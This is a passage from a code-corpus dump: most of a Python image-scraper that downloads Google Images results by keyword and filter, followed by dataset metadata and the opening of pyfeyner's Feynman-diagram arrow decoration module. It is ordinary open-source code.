choices=['tall', 'square', 'wide', 'panoramic']) parser.add_argument('-si', '--similar_images', help='downloads images very similar to the image URL you provide', type=str, required=False) parser.add_argument('-ss', '--specific_site', help='downloads images that are indexed from a specific website', type=str, required=False) parser.add_argument('-p', '--print_urls', default=False, help="Print the URLs of the images", action="store_true") parser.add_argument('-ps', '--print_size', default=False, help="Print the size of the images on disk", action="store_true") parser.add_argument('-pp', '--print_paths', default=False, help="Prints the list of absolute paths of the images",action="store_true") parser.add_argument('-m', '--metadata', default=False, help="Print the metadata of the image", action="store_true") parser.add_argument('-e', '--extract_metadata', default=False, help="Dumps all the logs into a text file", action="store_true") parser.add_argument('-st', '--socket_timeout', default=False, help="Connection timeout waiting for the image to download", type=float) parser.add_argument('-th', '--thumbnail', default=False, help="Downloads image thumbnail along with the actual image", action="store_true") parser.add_argument('-tho', '--thumbnail_only', default=False, help="Downloads only thumbnail without downloading actual images", action="store_true") parser.add_argument('-la', '--language', default=False, help="Defines the language filter. The search results are authomatically returned in that language", type=str, required=False, choices=['Arabic','Chinese (Simplified)','Chinese (Traditional)','Czech','Danish','Dutch','English','Estonian','Finnish','French','German','Greek','Hebrew','Hungarian','Icelandic','Italian','Japanese','Korean','Latvian','Lithuanian','Norwegian','Portuguese','Polish','Romanian','Russian','Spanish','Swedish','Turkish']) parser.add_argument('-pr', '--prefix', default=False, help="A word that you would want to prefix in front of each image name", type=str, required=False) parser.add_argument('-px', '--proxy', help='specify a proxy address and port', type=str, required=False) parser.add_argument('-cd', '--chromedriver', help='specify the path to chromedriver executable in your local machine', type=str, required=False) parser.add_argument('-ri', '--related_images', default=False, help="Downloads images that are similar to the keyword provided", action="store_true") parser.add_argument('-sa', '--safe_search', default=False, help="Turns on the safe search filter while searching for images", action="store_true") parser.add_argument('-nn', '--no_numbering', default=False, help="Allows you to exclude the default numbering of images", action="store_true") parser.add_argument('-of', '--offset', help="Where to start in the fetched links", type=str, required=False) parser.add_argument('-nd', '--no_download', default=False, help="Prints the URLs of the images and/or thumbnails without downloading them", action="store_true") parser.add_argument('-iu', '--ignore_urls', default=False, help="delimited list input of image urls/keywords to ignore", type=str) parser.add_argument('-sil', '--silent_mode', default=False, help="Remains silent. Does not print notification messages on the terminal", action="store_true") parser.add_argument('-is', '--save_source', help="creates a text file containing a list of downloaded images along with source page url", type=str, required=False) args = parser.parse_args() arguments = vars(args) records = [] records.append(arguments) return records class googleimagesdownload: def __init__(self): pass # Downloading entire Web Document (Raw Page Content) def download_page(self,url): version = (3, 0) cur_version = sys.version_info if cur_version >= version: # If the Current Version of Python is 3.0 or above try: headers = {} headers['User-Agent'] = "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" req = urllib.request.Request(url, headers=headers) resp = urllib.request.urlopen(req) respData = str(resp.read()) return respData except Exception as e: print("Could not open URL. Please check your internet connection and/or ssl settings \n" "If you are using proxy, make sure your proxy settings is configured correctly") sys.exit() else: # If the Current Version of Python is 2.x try: headers = {} headers['User-Agent'] = "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.27 Safari/537.17" req = urllib2.Request(url, headers=headers) try: response = urllib2.urlopen(req) except URLError: # Handling SSL certificate failed context = ssl._create_unverified_context() response = urlopen(req, context=context) page = response.read() return page except: print("Could not open URL. Please check your internet connection and/or ssl settings \n" "If you are using proxy, make sure your proxy settings is configured correctly") sys.exit() return "Page Not found" # Download Page for more than 100 images def download_extended_page(self,url,chromedriver): from selenium import webdriver from selenium.webdriver.common.keys import Keys if sys.version_info[0] < 3: reload(sys) sys.setdefaultencoding('utf8') options = webdriver.ChromeOptions() options.add_argument('--no-sandbox') options.add_argument("--headless") try: browser = webdriver.Chrome(chromedriver, chrome_options=options) except Exception as e: print("Looks like we cannot locate the path the 'chromedriver' (use the '--chromedriver' " "argument to specify the path to the executable.) or google chrome browser is not " "installed on your machine (exception: %s)" % e) sys.exit() browser.set_window_size(1024, 768) # Open the link browser.get(url) time.sleep(1) print("Getting you a lot of images. This may take a few moments...") element = browser.find_element_by_tag_name("body") # Scroll down for i in range(30): element.send_keys(Keys.PAGE_DOWN) time.sleep(0.3) try: browser.find_element_by_id("smb").click() for i in range(50): element.send_keys(Keys.PAGE_DOWN) time.sleep(0.3) # bot id protection except: for i in range(10): element.send_keys(Keys.PAGE_DOWN) time.sleep(0.3) # bot id protection print("Reached end of Page.") time.sleep(0.5) source = browser.page_source #page source #close the browser browser.close() return source #Correcting the escape characters for python2 def replace_with_byte(self,match): return chr(int(match.group(0)[1:], 8)) def repair(self,brokenjson): invalid_escape = re.compile(r'\\[0-7]{1,3}') # up to 3 digits for byte values up to FF return invalid_escape.sub(self.replace_with_byte, brokenjson) # Finding 'Next Image' from the given raw page def get_next_tab(self,s): start_line = s.find('class="dtviD"') if start_line == -1: # If no links are found then give an error! end_quote = 0 link = "no_tabs" return link,'',end_quote else: start_line = s.find('class="dtviD"') start_content = s.find('href="', start_line + 1) end_content = s.find('">', start_content + 1) url_item = "https://www.google.com" + str(s[start_content + 6:end_content]) url_item = url_item.replace('&amp;', '&') start_line_2 = s.find('class="dtviD"') s = s.replace('&amp;', '&') start_content_2 = s.find(':', start_line_2 + 1) end_content_2 = s.find('&usg=', start_content_2 + 1) url_item_name = str(s[start_content_2 + 1:end_content_2]) chars = url_item_name.find(',g_1:') chars_end = url_item_name.find(":", chars + 6) if chars_end == -1: updated_item_name = (url_item_name[chars + 5:]).replace("+", " ") else: updated_item_name = (url_item_name[chars+5:chars_end]).replace("+", " ") return url_item, updated_item_name, end_content # Getting all links with the help of '_images_get_next_image' def get_all_tabs(self,page): tabs = {} while True: item,item_name,end_content = self.get_next_tab(page) if item == "no_tabs": break else: if len(item_name) > 100 or item_name == "background-color": break else: tabs[item_name] = item # Append all the links in the list named 'Links' time.sleep(0.1) # Timer could be used to slow down the request for image downloads page = page[end_content:] return tabs #Format the object in readable format def format_object(self,object): formatted_object = {} formatted_object['image_format'] = object['ity'] formatted_object['image_height'] = object['oh'] formatted_object['image_width'] = object['ow'] formatted_object['image_link'] = object['ou'] formatted_object['image_description'] = object['pt'] formatted_object['image_host'] = object['rh'] formatted_object['image_source'] = object['ru'] formatted_object['image_thumbnail_url'] = object['tu'] return formatted_object #function to download single image def single_image(self,image_url): main_directory = "downloads" extensions = (".jpg", ".gif", ".png", ".bmp", ".svg", ".webp", ".ico") url = image_url try: os.makedirs(main_directory) except OSError as e: if e.errno != 17: raise pass req = Request(url, headers={ "User-Agent": "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.27 Safari/537.17"}) response = urlopen(req, None, 10) data = response.read() response.close() image_name = str(url[(url.rfind('/')) + 1:]) if '?' in image_name: image_name = image_name[:image_name.find('?')] # if ".jpg" in image_name or ".gif" in image_name or ".png" in image_name or ".bmp" in image_name or ".svg" in image_name or ".webp" in image_name or ".ico" in image_name: if any(map(lambda extension: extension in image_name, extensions)): file_name = main_directory + "/" + image_name else: file_name = main_directory + "/" + image_name + ".jpg" image_name = image_name + ".jpg" try: output_file = open(file_name, 'wb') output_file.write(data) output_file.close() except IOError as e: raise e except OSError as e: raise e print("completed ====> " + image_name.encode('raw_unicode_escape').decode('utf-8')) return def similar_images(self,similar_images): version = (3, 0) cur_version = sys.version_info if cur_version >= version: # If the Current Version of Python is 3.0 or above try: searchUrl = 'https://www.google.com/searchbyimage?site=search&sa=X&image_url=' + similar_images headers = {} headers['User-Agent'] = "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" req1 = urllib.request.Request(searchUrl, headers=headers) resp1 = urllib.request.urlopen(req1) content = str(resp1.read()) l1 = content.find('AMhZZ') l2 = content.find('&', l1) urll = content[l1:l2] newurl = "https://www.google.com/search?tbs=sbi:" + urll + "&site=search&sa=X" req2 = urllib.request.Request(newurl, headers=headers) resp2 = urllib.request.urlopen(req2) l3 = content.find('/search?sa=X&amp;q=') l4 = content.find(';', l3 + 19) urll2 = content[l3 + 19:l4] return urll2 except: return "Cloud not connect to Google Images endpoint" else: # If the Current Version of Python is 2.x try: searchUrl = 'https://www.google.com/searchbyimage?site=search&sa=X&image_url=' + similar_images headers = {} headers['User-Agent'] = "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.27 Safari/537.17" req1 = urllib2.Request(searchUrl, headers=headers) resp1 = urllib2.urlopen(req1) content = str(resp1.read()) l1 = content.find('AMhZZ') l2 = content.find('&', l1) urll = content[l1:l2] newurl = "https://www.google.com/search?tbs=sbi:" + urll + "&site=search&sa=X" req2 = urllib2.Request(newurl, headers=headers) resp2 = urllib2.urlopen(req2) l3 = content.find('/search?sa=X&amp;q=') l4 = content.find(';', l3 + 19) urll2 = content[l3 + 19:l4] return(urll2) except: return "Cloud not connect to Google Images endpoint" #Building URL parameters def build_url_parameters(self,arguments): if arguments['language']: lang = "&lr=" lang_param = {"Arabic":"lang_ar","Chinese (Simplified)":"lang_zh-CN","Chinese (Traditional)":"lang_zh-TW","Czech":"lang_cs","Danish":"lang_da","Dutch":"lang_nl","English":"lang_en","Estonian":"lang_et","Finnish":"lang_fi","French":"lang_fr","German":"lang_de","Greek":"lang_el","Hebrew":"lang_iw ","Hungarian":"lang_hu","Icelandic":"lang_is","Italian":"lang_it","Japanese":"lang_ja","Korean":"lang_ko","Latvian":"lang_lv","Lithuanian":"lang_lt","Norwegian":"lang_no","Portuguese":"lang_pt","Polish":"lang_pl","Romanian":"lang_ro","Russian":"lang_ru","Spanish":"lang_es","Swedish":"lang_sv","Turkish":"lang_tr"} lang_url = lang+lang_param[arguments['language']] else: lang_url = '' if arguments['time_range']: json_acceptable_string = arguments['time_range'].replace("'", "\"") d = json.loads(json_acceptable_string) time_range = ',cdr:1,cd_min:' + d['time_min'] + ',cd_max:' + d['time_max'] else: time_range = '' if arguments['exact_size']: size_array = [x.strip() for x in arguments['exact_size'].split(',')] exact_size = ",isz:ex,iszw:" + str(size_array[0]) + ",iszh:" + str(size_array[1]) else: exact_size = '' built_url = "&tbs=" counter = 0 params = {'color':[arguments['color'],{'red':'ic:specific,isc:red', 'orange':'ic:specific,isc:orange', 'yellow':'ic:specific,isc:yellow', 'green':'ic:specific,isc:green', 'teal':'ic:specific,isc:teel', 'blue':'ic:specific,isc:blue', 'purple':'ic:specific,isc:purple', 'pink':'ic:specific,isc:pink', 'white':'ic:specific,isc:white', 'gray':'ic:specific,isc:gray', 'black':'ic:specific,isc:black', 'brown':'ic:specific,isc:brown'}], 'color_type':[arguments['color_type'],{'full-color':'ic:color', 'black-and-white':'ic:gray','transparent':'ic:trans'}], 'usage_rights':[arguments['usage_rights'],{'labeled-for-reuse-with-modifications':'sur:fmc','labeled-for-reuse':'sur:fc','labeled-for-noncommercial-reuse-with-modification':'sur:fm','labeled-for-nocommercial-reuse':'sur:f'}], 'size':[arguments['size'],{'large':'isz:l','medium':'isz:m','icon':'isz:i','>400*300':'isz:lt,islt:qsvga','>640*480':'isz:lt,islt:vga','>800*600':'isz:lt,islt:svga','>1024*768':'visz:lt,islt:xga','>2MP':'isz:lt,islt:2mp','>4MP':'isz:lt,islt:4mp','>6MP':'isz:lt,islt:6mp','>8MP':'isz:lt,islt:8mp','>10MP':'isz:lt,islt:10mp','>12MP':'isz:lt,islt:12mp','>15MP':'isz:lt,islt:15mp','>20MP':'isz:lt,islt:20mp','>40MP':'isz:lt,islt:40mp','>70MP':'isz:lt,islt:70mp'}], 'type':[arguments['type'],{'face':'itp:face','photo':'itp:photo','clipart':'itp:clipart','line-drawing':'itp:lineart','animated':'itp:animated'}], 'time':[arguments['time'],{'past-24-hours':'qdr:d','past-7-days':'qdr:w','past-month':'qdr:m','past-year':'qdr:y'}], 'aspect_ratio':[arguments['aspect_ratio'],{'tall':'iar:t','square':'iar:s','wide':'iar:w','panoramic':'iar:xw'}], 'format':[arguments['format'],{'jpg':'ift:jpg','gif':'ift:gif','png':'ift:png','bmp':'ift:bmp','svg':'ift:svg','webp':'webp','ico':'ift:ico','raw':'ift:craw'}]} for key, value in params.items(): if value[0] is not None: ext_param = value[1][value[0]] # counter will tell if it is first param added or not if counter == 0: # add it to the built url built_url = built_url + ext_param counter += 1 else: built_url = built_url + ',' + ext_param counter += 1 built_url = lang_url+built_url+exact_size+time_range return built_url #building main search URL def build_search_url(self,search_term,params,url,similar_images,specific_site,safe_search): #check safe_search safe_search_string = "&safe=active" # check the args and choose the URL if url: url = url elif similar_images: print(similar_images) keywordem = self.similar_images(similar_images) url = 'https://www.google.com/search?q=' + keywordem + '&espv=2&biw=1366&bih=667&site=webhp&source=lnms&tbm=isch&sa=X&ei=XosDVaCXD8TasATItgE&ved=0CAcQ_AUoAg' elif specific_site: url = 'https://www.google.com/search?q=' + quote( search_term.encode('utf-8')) + '&as_sitesearch=' + specific_site + '&espv=2&biw=1366&bih=667&site=webhp&source=lnms&tbm=isch' + params + '&sa=X&ei=XosDVaCXD8TasATItgE&ved=0CAcQ_AUoAg' else: url = 'https://www.google.com/search?q=' + quote( search_term.encode('utf-8')) + '&espv=2&biw=1366&bih=667&site=webhp&source=lnms&tbm=isch' + params + '&sa=X&ei=XosDVaCXD8TasATItgE&ved=0CAcQ_AUoAg' #safe search check if safe_search: url = url + safe_search_string return url #measures the file size def file_size(self,file_path): if os.path.isfile(file_path): file_info = os.stat(file_path) size = file_info.st_size for x in ['bytes', 'KB', 'MB', 'GB', 'TB']: if size < 1024.0: return "%3.1f %s" % (size, x) size /= 1024.0 return size #keywords from file def keywords_from_file(self,file_name): search_keyword = [] with codecs.open(file_name, 'r', encoding='utf-8-sig') as f: if '.csv' in file_name: for line in f: if line in ['\n', '\r\n']: pass else: search_keyword.append(line.replace('\n', '').replace('\r', '')) elif '.txt' in file_name: for line in f: if line in ['\n', '\r\n']: pass else: search_keyword.append(line.replace('\n', '').replace('\r', '')) else: print("Invalid file type: Valid file types are either .txt or .csv \n" "exiting...") sys.exit() return search_keyword # make directories def create_directories(self,main_directory, dir_name,thumbnail,thumbnail_only): dir_name_thumbnail = dir_name + " - thumbnail" # make a search keyword directory try: if not os.path.exists(main_directory): os.makedirs(main_directory) time.sleep(0.2) path = (dir_name) sub_directory = os.path.join(main_directory, path) if not os.path.exists(sub_directory): os.makedirs(sub_directory) if thumbnail or thumbnail_only: sub_directory_thumbnail = os.path.join(main_directory, dir_name_thumbnail) if not os.path.exists(sub_directory_thumbnail): os.makedirs(sub_directory_thumbnail) else: path = (dir_name) sub_directory = os.path.join(main_directory, path) if not os.path.exists(sub_directory): os.makedirs(sub_directory) if thumbnail or thumbnail_only: sub_directory_thumbnail = os.path.join(main_directory, dir_name_thumbnail) if not os.path.exists(sub_directory_thumbnail): os.makedirs(sub_directory_thumbnail) except OSError as e: if e.errno != 17: raise pass return # Download Image thumbnails def download_image_thumbnail(self,image_url,main_directory,dir_name,return_image_name,print_urls,socket_timeout,print_size,no_download,save_source,img_src,ignore_urls): if print_urls or no_download: print("Image URL: " + image_url) if no_download: return "success","Printed url without downloading" try: req = Request(image_url, headers={ "User-Agent": "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.27 Safari/537.17"}) try: # timeout time to download an image if socket_timeout: timeout = float(socket_timeout) else: timeout = 10 response = urlopen(req, None, timeout) data = response.read() response.close() path = main_directory + "/" + dir_name + " - thumbnail" + "/" + return_image_name try: output_file = open(path, 'wb') output_file.write(data) output_file.close() if save_source: list_path = main_directory + "/" + save_source + ".txt" list_file = open(list_path,'a') list_file.write(path + '\t' + img_src + '\n') list_file.close() except OSError as e: download_status = 'fail' download_message = "OSError on an image...trying next one..." + " Error: " + str(e) except IOError as e: download_status = 'fail' download_message = "IOError on an image...trying next one..." + " Error: " + str(e) download_status = 'success' download_message = "Completed Image Thumbnail ====> " + return_image_name # image size parameter if print_size: print("Image Size: " + str(self.file_size(path))) except UnicodeEncodeError as e: download_status = 'fail' download_message = "UnicodeEncodeError on an image...trying next one..." + " Error: " + str(e) except HTTPError as e: # If there is any HTTPError download_status = 'fail' download_message = "HTTPError on an image...trying next one..." + " Error: " + str(e) except URLError as e: download_status = 'fail' download_message = "URLError on an image...trying next one..." + " Error: " + str(e) except ssl.CertificateError as e: download_status = 'fail' download_message = "CertificateError on an image...trying next one..." + " Error: " + str(e) except IOError as e: # If there is any IOError download_status = 'fail' download_message = "IOError on an image...trying next one..." + " Error: " + str(e) return download_status, download_message # Download Images def download_image(self,image_url,image_format,main_directory,dir_name,count,print_urls,socket_timeout,prefix,print_size,no_numbering,no_download,save_source,img_src,silent_mode,thumbnail_only,format,ignore_urls): if not silent_mode: if print_urls or no_download: print("Image URL: " + image_url) if ignore_urls: if any(url in image_url for url in ignore_urls.split(',')): return "fail", "Image ignored due to 'ignore url' parameter", None, image_url if thumbnail_only: return "success", "Skipping image download...", str(image_url[(image_url.rfind('/')) + 1:]), image_url if no_download: return "success","Printed url without downloading",None,image_url try: req = Request(image_url, headers={ "User-Agent": "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.27 Safari/537.17"}) try: # timeout time to download an image if socket_timeout: timeout = float(socket_timeout) else: timeout = 10 response = urlopen(req, None, timeout) data = response.read() response.close() extensions = [".jpg", ".jpeg", ".gif", ".png", ".bmp", ".svg", ".webp", ".ico"] # keep everything after the last '/' image_name = str(image_url[(image_url.rfind('/')) + 1:]) if format: if not image_format or image_format != format: download_status = 'fail' download_message = "Wrong image format returned. Skipping..." return_image_name = '' absolute_path = '' return download_status, download_message, return_image_name, absolute_path if image_format == "" or not image_format or "." + image_format not in extensions: download_status = 'fail' download_message = "Invalid or missing image format. Skipping..." return_image_name = '' absolute_path = '' return download_status, download_message, return_image_name, absolute_path elif image_name.lower().find("." + image_format) < 0: image_name = image_name + "." + image_format else: image_name = image_name[:image_name.lower().find("." + image_format) + (len(image_format) + 1)] # prefix name in image if prefix: prefix = prefix + " " else: prefix = '' if no_numbering: path = main_directory + "/" + dir_name + "/" + prefix + image_name else: path = main_directory + "/" + dir_name + "/" + prefix + str(count) + "." + image_name try: output_file = open(path, 'wb') output_file.write(data) output_file.close() if save_source: list_path = main_directory + "/" + save_source + ".txt" list_file = open(list_path,'a') list_file.write(path + '\t' + img_src + '\n') list_file.close() absolute_path = os.path.abspath(path) except OSError as e: download_status = 'fail' download_message = "OSError on an image...trying next one..." + " Error: " + str(e) return_image_name = '' absolute_path = '' #return image name back to calling method to use it for thumbnail downloads download_status = 'success' download_message = "Completed Image ====> " + prefix + str(count) + "." + image_name return_image_name = prefix + str(count) + "." + image_name # image size parameter if not silent_mode: if print_size: print("Image Size: " + str(self.file_size(path))) except UnicodeEncodeError as e: download_status = 'fail' download_message = "UnicodeEncodeError on an image...trying next one..." + " Error: " + str(e) return_image_name = '' absolute_path = '' except URLError as e: download_status = 'fail' download_message = "URLError on an image...trying next one..." + " Error: " + str(e) return_image_name = '' absolute_path = '' except BadStatusLine as e: download_status = 'fail' download_message = "BadStatusLine on an image...trying next one..." + " Error: " + str(e) return_image_name = '' absolute_path = '' except HTTPError as e: # If there is any HTTPError download_status = 'fail' download_message = "HTTPError on an image...trying next one..." + " Error: " + str(e) return_image_name = '' absolute_path = '' except URLError as e: download_status = 'fail' download_message = "URLError on an image...trying next one..." + " Error: " + str(e) return_image_name = '' absolute_path = '' except ssl.CertificateError as e: download_status = 'fail' download_message = "CertificateError on an image...trying next one..." + " Error: " + str(e) return_image_name = '' absolute_path = '' except IOError as e: # If there is any IOError download_status = 'fail' download_message = "IOError on an image...trying next one..." + " Error: " + str(e) return_image_name = '' absolute_path = '' except IncompleteRead as e: download_status = 'fail' download_message = "IncompleteReadError on an image...trying next one..." + " Error: " + str(e) return_image_name = '' absolute_path = '' return download_status,download_message,return_image_name,absolute_path # Finding 'Next Image' from the given raw page def _get_next_item(self,s): start_line = s.find('rg_meta notranslate') if start_line == -1: # If no links are found then give an error! end_quote = 0 link = "no_links" return link, end_quote else: start_line = s.find('class="rg_meta notranslate">') start_object = s.find('{', start_line + 1) end_object = s.find('</div>', start_object + 1) object_raw = str(s[start_object:end_object]) #remove escape characters based on python version version = (3, 0) cur_version = sys.version_info if cur_version >= version: #python3 try: object_decode = bytes(object_raw, "utf-8").decode("unicode_escape") final_object = json.loads(object_decode) except: final_object = "" else: #python2 try: final_object = (json.loads(self.repair(object_raw))) except: final_object = "" return final_object, end_object # Getting all links with the help of '_images_get_next_image' def _get_all_items(self,page,main_directory,dir_name,limit,arguments): items = [] abs_path = [] errorCount = 0 i = 0 count = 1 while count < limit+1: object, end_content = self._get_next_item(page) if object == "no_links": break elif object == "": page = page[end_content:] elif arguments['offset'] and count < int(arguments['offset']): count += 1 page = page[end_content:] else: #format the item for readability object = self.format_object(object) if arguments['metadata']: if not arguments["silent_mode"]: print("\nImage Metadata: " + str(object)) #download the images download_status,download_message,return_image_name,absolute_path = self.download_image(object['image_link'],object['image_format'],main_directory,dir_name,count,arguments['print_urls'],arguments['socket_timeout'],arguments['prefix'],arguments['print_size'],arguments['no_numbering'],arguments['no_download'],arguments['save_source'],object['image_source'],arguments["silent_mode"],arguments["thumbnail_only"],arguments['format'],arguments['ignore_urls']) if not arguments["silent_mode"]: print(download_message) if download_status == "success": # download image_thumbnails if arguments['thumbnail'] or arguments["thumbnail_only"]: download_status, download_message_thumbnail = self.download_image_thumbnail(object['image_thumbnail_url'],main_directory,dir_name,return_image_name,arguments['print_urls'],arguments['socket_timeout'],arguments['print_size'],arguments['no_download'],arguments['save_source'],object['image_source'],arguments['ignore_urls']) if not arguments["silent_mode"]: print(download_message_thumbnail) count += 1 object['image_filename'] = return_image_name items.append(object) # Append all the links in the list named 'Links' abs_path.append(absolute_path) else: errorCount += 1 #delay param if arguments['delay']: time.sleep(int(arguments['delay'])) page = page[end_content:] i += 1 if count < limit: print("\n\nUnfortunately all " + str( limit) + " could not be downloaded because some images were not downloadable. " + str( count-1) + " is all we got for this search filter!") return items,errorCount,abs_path # Bulk Download def download(self,arguments): paths_agg = {} # for input coming from other python files if __name__ != "__main__": # if the calling file contains config_file param if 'config_file' in arguments: records = [] json_file = json.load(open(arguments['config_file'])) for record in range(0, len(json_file['Records'])): arguments = {} for i in args_list: arguments[i] = None for key, value in json_file['Records'][record].items(): arguments[key] = value records.append(arguments) total_errors = 0 for rec in records: paths, errors = self.download_executor(rec) for i in paths: paths_agg[i] = paths[i] if not arguments["silent_mode"]: if arguments['print_paths']: print(paths.encode('raw_unicode_escape').decode('utf-8')) total_errors = total_errors + errors return paths_agg,total_errors # if the calling file contains params directly else: paths, errors = self.download_executor(arguments) for i in paths: paths_agg[i] = paths[i] if not arguments["silent_mode"]: if arguments['print_paths']: print(paths.encode('raw_unicode_escape').decode('utf-8')) return paths_agg, errors # for input coming from CLI else: paths, errors = self.download_executor(arguments) for i in paths: paths_agg[i] = paths[i] if not arguments["silent_mode"]: if arguments['print_paths']: print(paths.encode('raw_unicode_escape').decode('utf-8')) return paths_agg, errors def download_executor(self,arguments): paths = {} errorCount = None for arg in args_list: if arg not in arguments: arguments[arg] = None ######Initialization and Validation of user arguments if arguments['keywords']: search_keyword = [str(item) for item in arguments['keywords'].split(',')] if arguments['keywords_from_file']: search_keyword = self.keywords_from_file(arguments['keywords_from_file']) # both time and time range should not be allowed in the same query if arguments['time'] and arguments['time_range']: raise ValueError('Either time or time range should be used in a query. Both cannot be used at the same time.') # both time and time range should not be allowed in the same query if arguments['size'] and arguments['exact_size']: raise ValueError('Either "size" or "exact_size" should be used in a query. Both cannot be used at the same time.') # both image directory and no image directory should not be allowed in the same query if arguments['image_directory'] and arguments['no_directory']: raise ValueError('You can either specify image directory or specify no image directory, not both!') # Additional words added to keywords if arguments['suffix_keywords']: suffix_keywords = [" " + str(sk) for sk in arguments['suffix_keywords'].split(',')] else: suffix_keywords = [''] # Additional words added to keywords if arguments['prefix_keywords']: prefix_keywords = [str(sk) + " " for sk in arguments['prefix_keywords'].split(',')] else: prefix_keywords = [''] # Setting limit on number of images to be downloaded if arguments['limit']: limit = int(arguments['limit']) else: limit = 100 if arguments['url']: current_time = str(datetime.datetime.now()).split('.')[0] search_keyword = [current_time.replace(":", "_")] if arguments['similar_images']: current_time = str(datetime.datetime.now()).split('.')[0] search_keyword = [current_time.replace(":", "_")] # If single_image or url argument not present then keywords is mandatory argument if arguments['single_image'] is None and arguments['url'] is None and arguments['similar_images'] is None and \ arguments['keywords'] is None and arguments['keywords_from_file'] is None: print('-------------------------------\n' 'Uh oh! Keywords is a required argument \n\n' 'Please refer to the documentation on guide to writing queries \n' 'https://github.com/hardikvasa/google-images-download#examples' '\n\nexiting!\n' '-------------------------------') sys.exit() # If this argument is present, set the custom output directory if arguments['output_directory']: main_directory = arguments['output_directory'] else: main_directory = "downloads" # Proxy settings if arguments['proxy']: os.environ["http_proxy"] = arguments['proxy'] os.environ["https_proxy"] = arguments['proxy'] ######Initialization Complete total_errors = 0 for pky in prefix_keywords: # 1.for every prefix keywords for sky in suffix_keywords: # 2.for every suffix keywords i = 0 while i < len(search_keyword): # 3.for every main keyword iteration = "\n" + "Item no.: " + str(i + 1) + " -->" + " Item name = " + (pky) + (search_keyword[i]) + (sky) if not arguments["silent_mode"]: print(iteration.encode('raw_unicode_escape').decode('utf-8')) print("Evaluating...") else: print("Downloading images for: " + (pky) + (search_keyword[i]) + (sky) + " ...") search_term = pky + search_keyword[i] + sky if arguments['image_directory']: dir_name = arguments['image_directory'] elif arguments['no_directory']: dir_name = '' else: dir_name = search_term + ('-' + arguments['color'] if arguments['color'] else '') #sub-directory if not arguments["no_download"]: self.create_directories(main_directory,dir_name,arguments['thumbnail'],arguments['thumbnail_only']) #create directories in OS params = self.build_url_parameters(arguments) #building URL with params url = self.build_search_url(search_term,params,arguments['url'],arguments['similar_images'],arguments['specific_site'],arguments['safe_search']) #building main search url if limit < 101: raw_html = self.download_page(url) # download page else: raw_html = self.download_extended_page(url,arguments['chromedriver']) if not arguments["silent_mode"]: if arguments['no_download']: print("Getting URLs without downloading images...") else: print("Starting Download...") items,errorCount,abs_path = self._get_all_items(raw_html,main_directory,dir_name,limit,arguments) #get all image items and download images paths[pky + search_keyword[i] + sky] = abs_path #dumps into a json file if arguments['extract_metadata']: try: if not os.path.exists("logs"): os.makedirs("logs") except OSError as e: print(e) json_file = open("logs/"+search_keyword[i]+".json", "w") json.dump(items, json_file, indent=4, sort_keys=True) json_file.close() #Related images if arguments['related_images']: print("\nGetting list of related keywords...this may take a few moments") tabs = self.get_all_tabs(raw_html) for key, value in tabs.items(): final_search_term = (search_term + " - " + key) print("\nNow Downloading - " + final_search_term) if limit < 101: new_raw_html = self.download_page(value) # download page else: new_raw_html = self.download_extended_page(value,arguments['chromedriver']) self.create_directories(main_directory, final_search_term,arguments['thumbnail'],arguments['thumbnail_only']) self._get_all_items(new_raw_html, main_directory, search_term + " - " + key, limit,arguments) i += 1 total_errors = total_errors + errorCount if not arguments["silent_mode"]: print("\nErrors: " + str(errorCount) + "\n") return paths, total_errors #------------- Main Program -------------# def main(): records = user_input() total_errors = 0 t0 = time.time() # start the timer for arguments in records: if arguments['single_image']: # Download Single Image using a URL response = googleimagesdownload() response.single_image(arguments['single_image']) else: # or download multiple images based on keywords/keyphrase search response = googleimagesdownload() paths,errors = response.download(arguments) #wrapping response in a variable just for consistency total_errors = total_errors + errors t1 = time.time() # stop the timer total_time = t1 - t0 # Calculating the total time required to crawl, find and download all the links of 60,000 images if not arguments["silent_mode"]: print("\nEverything downloaded!") print("Total errors: " + str(total_errors)) print("Total time taken: " + str(total_time) + " Seconds") if __name__ == "__main__": main() # In[ ]:
mit
-2,625,954,641,360,469,500
50.941642
622
0.552625
false
4.112538
false
false
false
itoijala/pyfeyner
pyfeyner/deco.py
1
12057
# # pyfeyner - a simple Python interface for making Feynman diagrams. # Copyright (C) 2005-2010 Andy Buckley, Georg von Hippel # Copyright (C) 2013 Ismo Toijala # # pyfeyner is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation; either version 2 of the License, or # (at your option) any later version. # # pyfeyner is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License along # with pyfeyner; if not, write to the Free Software Foundation, Inc., # 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA. # """A couple of classes for decorating diagram elements.""" import math import pyx from pyfeyner.diagrams import FeynDiagram from pyfeyner.utils import Visible from pyfeyner import config class Arrow(pyx.deco.deco, pyx.attr.attr): """Arrow for Feynman diagram lines""" def __init__(self, pos=0.5, size=6*pyx.unit.v_pt, angle=45, constriction=0.8): self.pos = pos self.size = size self.angle = angle self.constriction = constriction def decorate(self, dp, texrunner=pyx.text.defaulttexrunner): """Attach arrow to a path (usually a line).""" dp.ensurenormpath() constrictionlen = self.size * self.constriction * \ math.cos(self.angle * math.pi / 360.0) arrowtopos = self.pos * dp.path.arclen() + 0.5 * self.size arrowtopath = dp.path.split(arrowtopos)[0] arrowpath = pyx.deco._arrowhead(arrowtopath, self.pos*dp.path.arclen(), 1, self.size, 45, True, constrictionlen) dp.ornaments.fill(arrowpath) return dp class FreeArrow(Visible): """Arrow not attached to any line in a diagram.""" def __init__(self, length=0.5 * pyx.unit.v_cm, size=6 * pyx.unit.v_pt, angle=45, constriction=0.8, pos=None, x=None, y=None, direction=0): self.x, self.y = 0, 